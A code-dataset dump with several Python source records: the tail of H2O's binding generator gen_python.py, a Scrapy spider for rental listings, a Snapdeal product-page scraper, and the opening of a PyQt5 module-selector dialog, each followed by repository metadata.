get_customizations_for(algo, 'extensions.__imports__')\n class_doc = get_customizations_for(algo, 'doc.__class__')\n class_examples = get_customizations_for(algo, 'examples.__class__')\n class_extras = get_customizations_for(algo, 'extensions.__class__')\n module_extras = get_customizations_for(algo, 'extensions.__module__')\n\n update_param_defaults = get_customizations_for('defaults', 'update_param')\n update_param = get_customizations_for(algo, 'update_param')\n deprecated_params = get_customizations_for(algo, 'deprecated_params', {})\n\n def extend_schema_params(param):\n pname = param.get('name')\n param = deepcopy(param)\n updates = None\n for update_fn in [update_param, update_param_defaults]:\n if callable(update_fn):\n updates = update_fn(pname, param)\n if updates is not None:\n param = updates\n break\n # return param if isinstance(param, (list, tuple)) else [param] # always return array to support deprecated aliases\n return param\n\n extended_params = [extend_schema_params(p) for p in schema['parameters']]\n\n param_names = []\n for param in extended_params:\n pname = param.get('name')\n ptype = param.get('type')\n pvalues = param.get('values')\n pdefault = param.get('default_value')\n\n assert (ptype[:4] == 'enum') == bool(pvalues), \"Values are expected for enum types only\"\n if pvalues:\n enum_values = [normalize_enum_constant(p) for p in pvalues]\n if pdefault:\n pdefault = normalize_enum_constant(pdefault)\n else:\n enum_values = None\n\n if pname in reserved_words:\n pname += \"_\"\n param_names.append(pname)\n param['pname'] = pname\n param['default_value'] = pdefault\n param['ptype'] = translate_type_for_check(ptype, enum_values)\n param['dtype'] = translate_type_for_doc(ptype, enum_values)\n \n if deprecated_params:\n extended_params = [p for p in extended_params if p['pname'] not in deprecated_params.keys()]\n\n yield \"#!/usr/bin/env python\"\n yield \"# -*- encoding: utf-8 -*-\"\n yield \"#\"\n yield \"# This file is auto-generated by h2o-3/h2o-bindings/bin/gen_python.py\"\n yield \"# Copyright 2016 H2O.ai; Apache License Version 2.0 (see LICENSE for details)\"\n yield \"#\"\n yield \"\"\n if deprecated_params:\n yield \"from h2o.utils.metaclass import deprecated_params, deprecated_property\"\n if extra_imports:\n yield reformat_block(extra_imports)\n yield \"from h2o.estimators.estimator_base import H2OEstimator\"\n yield \"from h2o.exceptions import H2OValueError\"\n yield \"from h2o.frame import H2OFrame\"\n yield \"from h2o.utils.typechecks import assert_is_type, Enum, numeric\"\n yield \"\"\n yield \"\"\n yield \"class %s(H2OEstimator):\" % classname\n yield ' \"\"\"'\n yield \" \" + schema[\"algo_full_name\"]\n yield \"\"\n if class_doc:\n yield reformat_block(class_doc, 4)\n if class_examples:\n yield \"\"\n yield \" :examples:\"\n yield \"\"\n yield reformat_block(class_examples, 4)\n yield ' \"\"\"'\n yield \"\"\n yield ' algo = \"%s\"' % algo\n yield \" supervised_learning = %s\" % get_customizations_for(algo, 'supervised_learning', True)\n options = get_customizations_for(algo, 'options')\n if options:\n yield \" _options_ = %s\" % reformat_block(pformat(options), prefix=' '*16, prefix_first=False)\n yield \"\"\n if deprecated_params:\n yield reformat_block(\"@deprecated_params(%s)\" % deprecated_params, indent=4)\n init_sig = \"def __init__(self,\\n%s\\n):\" % \"\\n\".join(\"%s=%s, # type: %s\" \n % (name, default, \"Optional[%s]\" % type if default is None else type) \n for name, default, type \n in [(p.get('pname'),\n stringify(p.get('default_value'), infinity=None),\n p.get('dtype'))\n for p in extended_params])\n yield reformat_block(init_sig, indent=4, prefix=' '*13, prefix_first=False)\n yield ' \"\"\"'\n for p in extended_params:\n pname, pdefault, dtype, pdoc = p.get('pname'), stringify(p.get('default_value')), p.get('dtype'), p.get('help')\n pdesc = \"%s: %s\\nDefaults to ``%s``.\" % (pname, pdoc, pdefault)\n pident = ' '*15\n yield \" :param %s\" % bi.wrap(pdesc, indent=pident, indent_first=False)\n yield \" :type %s: %s%s\" % (pname, \n bi.wrap(dtype, indent=pident, indent_first=False),\n \", optional\" if pdefault is None else \"\")\n yield ' \"\"\"'\n yield \" super(%s, self).__init__()\" % classname\n yield \" self._parms = {}\"\n for p in extended_params:\n pname = p.get('pname')\n if pname == 'model_id':\n yield \" self._id = self._parms['model_id'] = model_id\"\n else:\n yield \" self.%s = %s\" % (pname, pname)\n rest_api_version = get_customizations_for(algo, 'rest_api_version')\n if rest_api_version:\n yield ' self._parms[\"_rest_version\"] = %s' % rest_api_version\n yield \"\"\n for param in extended_params:\n pname = param.get('pname')\n if pname == \"model_id\":\n continue # The getter is already defined in ModelBase\n sname = pname[:-1] if pname[-1] == '_' else pname\n ptype = param.get('ptype')\n dtype = param.get('dtype')\n pdefault = param.get('default_value')\n\n if dtype.startswith(\"Enum\"):\n vals = dtype[5:-1].split(\", \")\n property_doc = \"One of: \" + \", \".join(\"``%s``\" % v for v in vals)\n else:\n property_doc = \"Type: ``%s``\" % dtype\n property_doc += (\".\" if pdefault is None else \", defaults to ``%s``.\" % stringify(pdefault))\n\n yield \" @property\"\n yield \" def %s(self):\" % pname\n yield ' \"\"\"'\n yield bi.wrap(param.get('help'), indent=8*' ') # we need to wrap only for text coming from server\n yield \"\"\n yield bi.wrap(property_doc, indent=8*' ')\n custom_property_doc = get_customizations_for(algo, \"doc.{}\".format(pname))\n if custom_property_doc:\n yield \"\"\n yield reformat_block(custom_property_doc, 8)\n property_examples = get_customizations_for(algo, \"examples.{}\".format(pname))\n if property_examples:\n yield \"\"\n yield \" :examples:\"\n yield \"\"\n yield reformat_block(property_examples, 8)\n yield ' \"\"\"'\n property_getter = get_customizations_or_defaults_for(algo, \"overrides.{}.getter\".format(pname)) # check gen_stackedensemble.py for an example\n if property_getter:\n yield reformat_block(property_getter.format(**locals()), 8)\n else:\n yield \" return self._parms.get(\\\"%s\\\")\" % sname\n\n yield \"\"\n yield \" @%s.setter\" % pname\n yield \" def %s(self, %s):\" % (pname, pname)\n property_setter = get_customizations_or_defaults_for(algo, \"overrides.{}.setter\".format(pname)) # check gen_stackedensemble.py for an example\n if property_setter:\n yield reformat_block(property_setter.format(**locals()), 8)\n elif \"H2OFrame\" in ptype: \n yield \" self._parms[\\\"%s\\\"] = H2OFrame._validate(%s, '%s')\" % (sname, pname, pname)\n else:\n yield \" assert_is_type(%s, None, %s)\" % (pname, ptype)\n yield \" self._parms[\\\"%s\\\"] = %s\" % (sname, pname)\n yield \"\"\n \n for old, new in deprecated_params.items():\n new_name = new[0] if isinstance(new, tuple) else new\n yield \" %s = deprecated_property('%s', %s)\" % (old, old, new)\n \n yield \"\"\n if class_extras:\n yield reformat_block(code_as_str(class_extras), 4)\n if module_extras:\n yield \"\"\n yield reformat_block(code_as_str(module_extras))\n\n\ndef algo_to_classname(algo):\n if algo == \"coxph\": return \"H2OCoxProportionalHazardsEstimator\"\n if algo == \"deeplearning\": return \"H2ODeepLearningEstimator\"\n if algo == \"xgboost\": return \"H2OXGBoostEstimator\"\n if algo == \"infogram\": return \"H2OInfogram\"\n if algo == \"gbm\": return \"H2OGradientBoostingEstimator\"\n if algo == \"glm\": return \"H2OGeneralizedLinearEstimator\"\n if algo == \"glrm\": return \"H2OGeneralizedLowRankEstimator\"\n if algo == \"kmeans\": return \"H2OKMeansEstimator\"\n if algo == \"naivebayes\": return \"H2ONaiveBayesEstimator\"\n if algo == \"drf\": return \"H2ORandomForestEstimator\"\n if algo == \"upliftdrf\": return \"H2OUpliftRandomForestEstimator\"\n if algo == \"svd\": return \"H2OSingularValueDecompositionEstimator\"\n if algo == \"pca\": return \"H2OPrincipalComponentAnalysisEstimator\"\n if algo == \"stackedensemble\": return \"H2OStackedEnsembleEstimator\"\n if algo == \"isolationforest\": return \"H2OIsolationForestEstimator\"\n if algo == \"extendedisolationforest\": return \"H2OExtendedIsolationForestEstimator\"\n if algo == \"dt\": return \"H2ODecisionTreeEstimator\"\n if algo == \"psvm\": return \"H2OSupportVectorMachineEstimator\"\n if algo == \"gam\": return \"H2OGeneralizedAdditiveEstimator\"\n if algo == \"anovaglm\": return \"H2OANOVAGLMEstimator\"\n if algo == \"targetencoder\": return \"H2OTargetEncoderEstimator\"\n if algo == \"rulefit\": return \"H2ORuleFitEstimator\"\n if algo == \"modelselection\": return \"H2OModelSelectionEstimator\"\n if algo == \"isotonicregression\": return \"H2OIsotonicRegressionEstimator\"\n if algo == \"adaboost\": return \"H2OAdaBoostEstimator\"\n return \"H2O\" + algo.capitalize() + \"Estimator\"\n\n\ndef gen_init(modules):\n yield \"#!/usr/bin/env python\"\n yield \"# -*- encoding: utf-8 -*-\"\n yield \"#\"\n yield \"# This file is auto-generated by h2o-3/h2o-bindings/bin/gen_python.py\"\n yield \"# Copyright 2016 H2O.ai; Apache License Version 2.0 (see LICENSE for details)\"\n yield \"#\"\n yield \"import inspect\"\n yield \"import sys\"\n yield \"\"\n module_strs = []\n # imports estimators\n for full_module, module, clz, category in sorted(modules):\n if module in [\"grid\", \"automl\"]:\n continue\n module_strs.append('\"%s\"' % clz)\n yield \"from .%s import %s\" % (module, clz)\n # global methods for h2o.estimators module\n yield \"\"\"\n\nmodule = sys.modules[__name__]\n\n\ndef _algo_for_estimator_(shortname, cls):\n if shortname == 'H2OAutoEncoderEstimator':\n return 'autoencoder'\n return cls.algo\n\n\n_estimator_cls_by_algo_ = {_algo_for_estimator_(name, cls): cls\n for name, cls in inspect.getmembers(module, inspect.isclass)\n if hasattr(cls, 'algo')}\n\n\ndef create_estimator(algo, **params):\n if algo not in _estimator_cls_by_algo_:\n raise ValueError(\"Unknown algo type: \" + algo)\n return _estimator_cls_by_algo_[algo](**params)\n\n\"\"\"\n # auto-exports\n yield \"__all__ = (\"\n yield bi.wrap('\"create_estimator\",', indent=\" \"*4)\n yield bi.wrap(\", \".join(module_strs), indent=\" \"*4)\n yield \")\"\n\n\ndef gen_models_docs(modules):\n yield \".. This file is autogenerated from gen_python.py, DO NOT MODIFY\"\n yield \"\"\n yield \":tocdepth: 3\"\n yield \"\"\n yield \"Modeling In H2O\"\n yield \"===============\"\n modules_with_globals = ['automl']\n for cat in [\"Supervised\", \"Unsupervised\", \"Miscellaneous\"]:\n yield \"\"\n yield cat\n yield \"+\" * len(cat)\n yield \"\"\n for full_module, module, clz, category in sorted(modules):\n if category != cat: continue\n # doc for module\n if module in modules_with_globals:\n yield \":mod:`%s`\" % module\n yield \"-\" * (7 + len(module))\n yield \".. automodule:: %s\" % full_module\n yield \" :members:\"\n yield \" :exclude-members: %s\" % clz\n yield \"\"\n # doc for class\n full_clz = '.'.join([full_module, clz])\n yield \":mod:`%s`\" % clz\n yield \"-\" * (7 + len(clz))\n yield \".. autoclass:: %s\" % full_clz\n yield \" :show-inheritance:\"\n yield \" :members:\"\n yield \"\"\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# MAIN:\n# ----------------------------------------------------------------------------------------------------------------------\ndef main():\n bi.init(\"Python\", \"../../../h2o-py/h2o/estimators\", clear_dir=False)\n\n modules = [(\"h2o.estimators.deeplearning\", \"deeplearning\", \"H2OAutoEncoderEstimator\", \"Unsupervised\"),\n (\"h2o.estimators.estimator_base\", \"estimator_base\", \"H2OEstimator\", \"Miscellaneous\"),\n (\"h2o.grid\", \"grid\", \"H2OGridSearch\", \"Miscellaneous\"),\n (\"h2o.automl\", \"automl\", \"H2OAutoML\", \"Miscellaneous\")]\n builders = bi.model_builders().items()\n algo_to_module = dict(\n drf=\"random_forest\",\n naivebayes=\"naive_bayes\",\n isolationforest=\"isolation_forest\",\n extendedisolationforest=\"extended_isolation_forest\",\n dt=\"decision_tree\",\n upliftdrf=\"uplift_random_forest\",\n modelselection=\"model_selection\"\n )\n algo_to_category = dict(\n svd=\"Miscellaneous\",\n word2vec=\"Miscellaneous\"\n )\n for name, mb in builders:\n module = name\n if name in algo_to_module:\n module = algo_to_module[name]\n bi.vprint(\"Generating model: \" + name)\n bi.write_to_file(\"%s.py\" % module, gen_module(mb, name))\n category = algo_to_category[name] if name in algo_to_category \\\n else \"Supervised\" if mb[\"supervised\"] \\\n else \"Unsupervised\"\n full_module = '.'.join([\"h2o.estimators\", module])\n modules.append((full_module, module, algo_to_classname(name), category))\n\n bi.write_to_file(\"__init__.py\", gen_init(modules))\n bi.write_to_file(\"../../docs/modeling.rst\", gen_models_docs(modules))\n\n type_adapter1.vprint_translation_map()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-bindings/bin/gen_python.py", "file_name": "gen_python.py", "file_ext": "py", "file_size_in_byte": 20598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "custom.get_customizations_for", "line_number": 14, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 14, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 18, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 27, "usage_type": "call"}, {"api_name": "bindings.TypeTranslator", "line_number": 32, "usage_type": "attribute"}, {"api_name": "bindings.TypeTranslator", "line_number": 66, "usage_type": "attribute"}, {"api_name": "custom.get_customizations_for", "line_number": 146, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 147, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 148, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 149, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 150, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 152, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 153, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 154, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 158, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 207, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 219, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 224, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 228, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 229, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 231, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 231, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 234, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 242, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 248, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 250, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 261, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 284, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 286, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 287, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 290, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 291, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 296, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 300, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 309, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 323, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 326, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 400, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 401, "usage_type": "call"}, {"api_name": "bindings.init", "line_number": 442, "usage_type": "call"}, {"api_name": "bindings.model_builders", "line_number": 448, "usage_type": "call"}, {"api_name": "bindings.vprint", "line_number": 466, "usage_type": "call"}, {"api_name": "bindings.write_to_file", "line_number": 467, "usage_type": "call"}, {"api_name": "bindings.write_to_file", "line_number": 474, "usage_type": "call"}, {"api_name": "bindings.write_to_file", "line_number": 475, "usage_type": "call"}]} +{"seq_id": "24938136103", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom housing.items import HousingItem\nimport urllib.request\nimport json\n\n\nclass ShowMeTheRentSpider(scrapy.Spider):\n name = \"show_me_the_rent\"\n\n def __init__(self, *args, **kwargs):\n super(ShowMeTheRentSpider, self).__init__(*args, **kwargs)\n\n def start_requests(self):\n cities = ['Durham', 'Raleigh', 'ChapelHill']\n urls = ['https://www.showmetherent.com/listings/' + c for c in cities]\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n\n for sel in response.xpath('//div[@class=\"listing-table\"]/div'):\n try:\n item = HousingItem()\n item['classification'] = trimSlashes(sel.xpath('.//div[@class=\"c3 listing-secondary\"]/p[@class=\"listing-numunits\"]/text()').extract_first())\n item['specs'] = sel.xpath('.//div[@class=\"c3 listing-secondary\"]/p[@class=\"listing-bedrooms\"]/text()').extract_first()\n item['pricePerMonth'] = stripPrice(sel.xpath('.//div[@class=\"c4 listing-rent-wrapper\"]/p[@class=\"listing-rent\"]/text()').extract_first())\n item['dateListed'] = trimSlashes(sel.xpath('.//div[@class=\"c3 listing-secondary\"]/p[@class=\"listing-lastupdate\"]/text()').extract_first())\n streetAddress = sel.xpath('.//div[@class=\"c2 listing-name\"]/h2/a/text()').extract_first()\n city = trimSlashes(sel.xpath('.//div[@class=\"c2 listing-name\"]/h3/text()').extract_first())\n item['address'] = streetAddress + ', ' + city\n item['url'] = 'www.showmetherent.com' + sel.xpath('.//div[@class=\"c2 listing-name\"]/h2/a/@href').extract_first()\n yield item\n except:\n pass\n\n nextPagesList = sel.xpath('//div[@class=\"page_bar\"]/a')\n next_page = nextPagesList[len(nextPagesList) - 1].xpath('.//@href').extract_first()\n if next_page is not None:\n next_page = \"https://www.showmetherent.com\" + next_page\n yield scrapy.Request(next_page, self.parse)\n\ndef trimSlashes(string):\n if '\\n' or '\\r' or '\\t' or '\\u00bd' in string:\n string = string.replace('\\n', '').replace('\\r', '').replace('\\t', '').replace('\\u00bd', '')\n string = string.rstrip().lstrip()\n return string\n\ndef stripPrice(string):\n if '-' in string:\n string = string[0:string.index('-')]\n string = string.replace('$', '').replace(',', '')\n return string\n\ndef representsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n", "repo_name": "hack-duke/hackduke-CEF", "sub_path": "scrapy-flask/housing/spiders/show_me_the_rent.py", "file_name": "show_me_the_rent.py", "file_ext": "py", "file_size_in_byte": 2606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 8, "usage_type": "attribute"}, {"api_name": "scrapy.Request", "line_number": 19, "usage_type": "call"}, {"api_name": "housing.items.HousingItem", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "41791626455", "text": "#!/usr/bin/python\n\nimport re\nfrom lxml import html\nimport requests\n\nfrom extract_data import Scraper\nfrom spiders_shared_code.snapdeal_variants import SnapdealVariants\n\n\nclass SnapdealScraper(Scraper):\n ##########################################\n ############### PREP\n ##########################################\n\n REVIEW_URL = 'https://www.snapdeal.com/review/stats/{product_id}'\n\n INVALID_URL_MESSAGE = \"Expected URL format is http(s)://www.snapdeal.com/product//\"\n\n def __init__(self, **kwargs):# **kwargs are presumably (url, bot)\n Scraper.__init__(self, **kwargs)\n\n self.sv = SnapdealVariants()\n\n def check_url_format(self):\n m = re.match(\"https?://www\\.snapdeal\\.com/product/.*\", self.product_page_url)\n return bool(m)\n\n def not_a_product(self):\n if self.tree_html.xpath(\"//meta[@property='og:type']/@content\")[0] != \"snapdeallog:item\":\n return True\n\n self.sv.setupCH(self.tree_html)\n\n return False\n\n ##########################################\n ############### CONTAINER : NONE\n ##########################################\n\n def _product_id(self):\n return self.product_page_url.split('/')[-1]\n\n ##########################################\n ############### CONTAINER : PRODUCT_INFO\n ##########################################\n\n def _product_name(self):\n return self.tree_html.xpath(\"//meta[@name='og_title']/@content\")[0].strip()\n\n def _product_title(self):\n return self._product_name()\n\n def _title_seo(self):\n return self._product_name()\n\n def _features(self):\n features = []\n\n features_td_list = self.tree_html.xpath(\"//table[@class='product-spec']//tr/td\")\n\n for index, td in enumerate(features_td_list):\n if (index + 1) % 2 != 0:\n continue\n\n features.append(features_td_list[index - 1].text_content() + \" \" + td.text_content())\n\n if features:\n return features\n\n def _description(self):\n short_description = None\n\n spec_title_list = self.tree_html.xpath(\"//h3[@class='spec-title']\")\n\n for spec_title in spec_title_list:\n if \"Highlights\" in spec_title.text_content():\n short_description = spec_title.xpath(\"./../following-sibling::div[@class='spec-body']\")[0].text_content().strip()\n break\n\n if short_description:\n return short_description\n\n def _long_description(self):\n long_description = self.tree_html.xpath(\"//div[@itemprop='description' and @class='detailssubbox']\")\n\n if long_description:\n return long_description[0].text_content().strip()\n\n def _variants(self):\n return self.sv._variants()\n\n ##########################################\n ############### CONTAINER : PAGE_ATTRIBUTES\n ##########################################\n \n def _image_urls(self):\n image_urls = self.tree_html.xpath(\"//div[@class='baseSliderPager']//img/@src\")\n lazy_image_urls = self.tree_html.xpath(\"//div[@class='baseSliderPager']//img/@lazysrc\")\n image_urls = image_urls + lazy_image_urls\n\n if not image_urls:\n image_urls = self.tree_html.xpath(\"//div[@id='bx-pager-left-image-panel']//img/@src\")\n lazy_image_urls = self.tree_html.xpath(\"//div[@id='bx-pager-left-image-panel']//img/@lazysrc\")\n image_urls = image_urls + lazy_image_urls\n\n if image_urls:\n return image_urls\n\n def _video_urls(self):\n iframe_list = self.tree_html.xpath(\"//iframe\")\n\n youtubu_iframes = []\n\n for iframe in iframe_list:\n if \"www.youtube.com\" in iframe.xpath(\"./@lazysrc\")[0]:\n youtubu_iframes.append(iframe)\n\n youtubu_urls = []\n\n for iframe in youtubu_iframes:\n youtubu_urls.append(iframe.xpath(\"./@lazysrc\")[0].strip())\n\n if youtubu_urls:\n return youtubu_urls\n\n ##########################################\n ############### CONTAINER : REVIEWS\n ##########################################\n\n def _reviews(self):\n if self.is_review_checked:\n return self.reviews\n\n self.is_review_checked = True\n\n product_id = self._product_id()\n\n review_content = requests.get(self.REVIEW_URL.format(product_id=product_id), timeout=10).text\n review_content = html.fromstring(review_content)\n rating_blocks = review_content.xpath(\"//div[@class='product_infogram']//div[contains(@class, 'row')]\")\n\n review_list = []\n max_review = None\n min_review = None\n\n for rating_block in rating_blocks:\n review_rate = int(rating_block.xpath(\".//span[contains(@class, 'lfloat')]/text()\")[0][0])\n review_count = int(rating_block.xpath(\".//span[contains(@class, 'barover')]/following-sibling::span/text()\")[0])\n review_list.append([review_rate, review_count])\n\n if not max_review:\n max_review = review_rate\n elif review_count > 0 and review_rate > max_review:\n max_review = review_rate\n\n if not min_review:\n min_review = review_rate\n elif review_count > 0 and review_rate < min_review:\n min_review = review_rate\n\n self.reviews = review_list\n self.average_review = float(self.tree_html.xpath(\"//span[@itemprop='ratingValue']/text()\")[0].strip())\n self.review_count = int(self.tree_html.xpath(\"//span[@itemprop='ratingCount']/text()\")[0].strip())\n self.max_review = max_review\n self.min_review = min_review\n\n return self.reviews\n\n ##########################################\n ############### CONTAINER : SELLERS\n ##########################################\n\n def _price(self):\n return '{} {}'.format(self._price_currency(), self.tree_html.xpath(\"//span[@itemprop='price']/text()\")[0])\n\n def _price_amount(self):\n price_amount = self.tree_html.xpath(\"//input[@id='productPrice']/@value\")[0]\n\n if str(int(price_amount)) == price_amount:\n return int(price_amount)\n else:\n return float(price_amount)\n\n def _price_currency(self):\n return 'Rs.'\n\n def _site_online(self):\n return 1\n\n def _in_stores(self):\n return 1\n\n def _site_online_out_of_stock(self):\n if self.tree_html.xpath(\"//div[@class='container-fluid inStockNotify reset-padding ']\"):\n return 1\n\n return 0\n\n ##########################################\n ############### CONTAINER : CLASSIFICATION\n ########################################## \n\n def _categories(self):\n return self.tree_html.xpath(\"//div[@class='containerBreadcrumb']//span[@itemprop='title']/text()\")\n\n def _brand(self):\n return self.tree_html.xpath(\"//input[@id='brandName']/@value\")[0]\n\n ##########################################\n ################ RETURN TYPES\n ##########################################\n\n # dictionaries mapping type of info to be extracted to the method that does it\n # also used to define types of data that can be requested to the REST service\n\n DATA_TYPES = { \\\n # CONTAINER : NONE\n \"product_id\" : _product_id, \\\n\n # CONTAINER : PRODUCT_INFO\n \"product_name\" : _product_name, \\\n \"product_title\" : _product_title, \\\n \"title_seo\" : _title_seo, \\\n \"features\" : _features, \\\n \"description\" : _description, \\\n \"long_description\" : _long_description, \\\n \"variants\": _variants,\n\n # CONTAINER : PAGE_ATTRIBUTES\n \"image_urls\" : _image_urls, \\\n \"video_urls\" : _video_urls, \\\n\n # CONTAINER : REVIEWS\n \"reviews\" : _reviews, \\\n\n # CONTAINER : SELLERS\n \"price\" : _price, \\\n \"price_amount\" : _price_amount, \\\n \"price_currency\" : _price_currency, \\\n \"site_online\": _site_online, \\\n \"site_online_out_of_stock\": _site_online_out_of_stock, \\\n \"in_stores\" : _in_stores, \\\n\n # CONTAINER : CLASSIFICATION\n \"categories\" : _categories, \\\n \"brand\" : _brand, \\\n }\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "special_crawler/extract_snapdeal_data.py", "file_name": "extract_snapdeal_data.py", "file_ext": "py", "file_size_in_byte": 8180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "extract_data.Scraper", "line_number": 11, "usage_type": "name"}, {"api_name": "extract_data.Scraper.__init__", "line_number": 21, "usage_type": "call"}, {"api_name": "extract_data.Scraper", "line_number": 21, "usage_type": "name"}, {"api_name": "spiders_shared_code.snapdeal_variants.SnapdealVariants", "line_number": 23, "usage_type": "call"}, {"api_name": "re.match", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 139, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 140, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 140, "usage_type": "name"}]} +{"seq_id": "26878373930", "text": "from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\n\n\nclass ModuleSeletorDialog(QtWidgets.QDialog):\n\n def __init__(self, modules_info, parent=None):\n self.modules_info = modules_info\n super(ModuleSeletorDialog, self).__init__(parent)\n self.setWindowFlags(QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)\n\n self.title = \"ASR - Module Select\"\n self.setWindowTitle(self.title)\n self.setModal(True)\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n\n self.screen_label = QtWidgets.QLabel(\"Select the modules:\")\n self.verticalLayout.addWidget(self.screen_label)\n\n self.parent_allmodule_hbox = QtWidgets.QHBoxLayout()\n self.parent_allmodule_hbox.setObjectName('parentlayout')\n self.parent_allmodule_hbox.insertSpacing(0, 40)\n\n self.allmodule_layout = QtWidgets.QVBoxLayout()\n self.allmodule_layout.insertSpacing(0, 10)\n self.allmodule_layout.setSpacing(6)\n self.allmodule_layout.setObjectName(\"allmodule_layout\")\n\n self.checkboxes = []\n self.add_module_checkboxes()\n\n self.parent_allmodule_hbox.addLayout(self.allmodule_layout)\n self.verticalLayout.addLayout(self.parent_allmodule_hbox)\n\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignCenter)\n self.button_layout.setObjectName(\"button_layout\")\n\n self.box = QtWidgets.QDialogButtonBox()\n self.box.addButton(\"Next\", QtWidgets.QDialogButtonBox.AcceptRole)\n self.box.addButton(\"Cancel\", QtWidgets.QDialogButtonBox.RejectRole)\n\n self.nextButton = QtWidgets.QPushButton('Next')\n self.cancelButton = QtWidgets.QPushButton('Cancel')\n self.button_layout.addWidget(self.nextButton)\n self.button_layout.addWidget(self.cancelButton)\n\n #\n self.verticalLayout.addLayout(self.button_layout)\n\n self.nextButton.clicked.connect(self.accept)\n self.cancelButton.clicked.connect(self.reject)\n\n self.resize(400, 120)\n\n\n def add_module_checkboxes(self):\n modules = self.modules_info #modules_info list: [module_names]\n for module in modules:\n self.module_layout1 = QtWidgets.QVBoxLayout()\n self.module_layout1.setObjectName(\"module_layout1\")\n #Check box setup for a device\n self.module_checkbox = QtWidgets.QCheckBox(self)\n self.module_checkbox.setText(module)\n self.module_checkbox.setObjectName(\"module_checkbox\")\n self.module_layout1.addWidget(self.module_checkbox)\n self.allmodule_layout.addLayout(self.module_layout1)\n #self.module_checkbox.stateChanged.connect(self.)\n self.checkboxes.append(self.module_checkbox)", "repo_name": "Anand-Nakhate/Async-ASR", "sub_path": "async-asr-newWebSocket/utilities/ModuleSeletorDialog.py", "file_name": "ModuleSeletorDialog.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 5, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 10, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 10, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 38, "usage_type": "attribute"}, {"api_name": 